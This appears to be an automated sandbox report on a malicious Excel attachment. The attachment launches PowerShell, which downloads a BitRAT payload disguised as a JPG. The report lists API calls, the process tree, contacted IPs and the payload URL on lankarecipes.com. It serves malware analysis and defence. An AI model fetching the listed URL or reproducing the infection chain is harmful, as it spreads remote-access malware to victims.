Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetLocaleInfoW, 29_2_0058E1F1
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: ___crtGetLocaleInfoEx, 29_2_0058E2F3
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetLocaleInfoW, 29_2_006A2367
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 29_2_006AABFF
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006AAE77
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006AAEC2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006AAF5D
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 29_2_006AB363
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 29_2_006AB537
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006A1DE7
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004139F1 __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64, 29_2_004139F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected BitRAT
Source: Yara match File source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

Remote Access Functionality:

Yara detected BitRAT
Source: Yara match File source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY
Behavior Graph ID: 337288  Sample: Scanned_25526662-Payment.xls  Startdate: 08/01/2021  Architecture: WINDOWS  Score: 100

Behavior graph (process tree reconstructed from the graph's node and edge labels; the numbers after a process name are the node's counters as shown in the graph):

Scanned_25526662-Payment.xls (root)
  Signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 8 other signatures
  -> EXCEL.EXE 29 37 (started)
       Dropped: C:\Users\...\Scanned_25526662-Payment.xls.LNK (MS)
       Signatures: Document exploit detected (process start blacklist hit); PowerShell case anomaly found
       -> cmd.exe 1 (started)
            Signatures: PowerShell case anomaly found
            -> powershell.exe 15 36 (started)
                 Network: lankarecipes.com 192.185.236.165, ports 49731, 80, UNIFIEDLAYER-AS-1US, United States
                 Dropped: C:\Users\user\AppData\Local\Temp\Test1.txt (PE32); C:\Users\user\AppData\...\nwaha3c5.cmdline (UTF-8)
                 Signatures: Powershell drops PE file
                 -> cmd.exe 1 (started)
                      -> WMIC.exe 1 (started)
                           Signatures: Creates processes via WMI
                 -> cmd.exe 2 (started)
                      Dropped: C:\Users\user\AppData\Local\Temp\Test3.jpg (PE32)
                 -> csc.exe 3 (started)
                      Dropped: C:\Users\user\AppData\Local\...\nwaha3c5.dll (PE32)
                      -> cvtres.exe 1 (started)
            -> conhost.exe (started)
  -> Test3.jpg (started)
       Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process; Contains functionality to hide a thread from the debugger
       -> Test3.jpg 1 (started)
            Network: 45.15.143.216, ports 49734, 49740, 49742, DEDIPATH-LLCUS, Latvia
            Signatures: Hides threads from debuggers

Contacted Public IPs

IP               Domain   Country        ASN    ASN Name             Malicious
45.15.143.216    unknown  Latvia         35913  DEDIPATH-LLCUS       false
192.185.236.165  unknown  United States  46606  UNIFIEDLAYER-AS-1US  true

Contacted Domains

Name              IP               Active
lankarecipes.com  192.185.236.165  true

Contacted URLs

Name                               Malicious  Antivirus Detection    Reputation
http://lankarecipes.com/Sparc.jpg  false      Avira URL Cloud: safe  unknown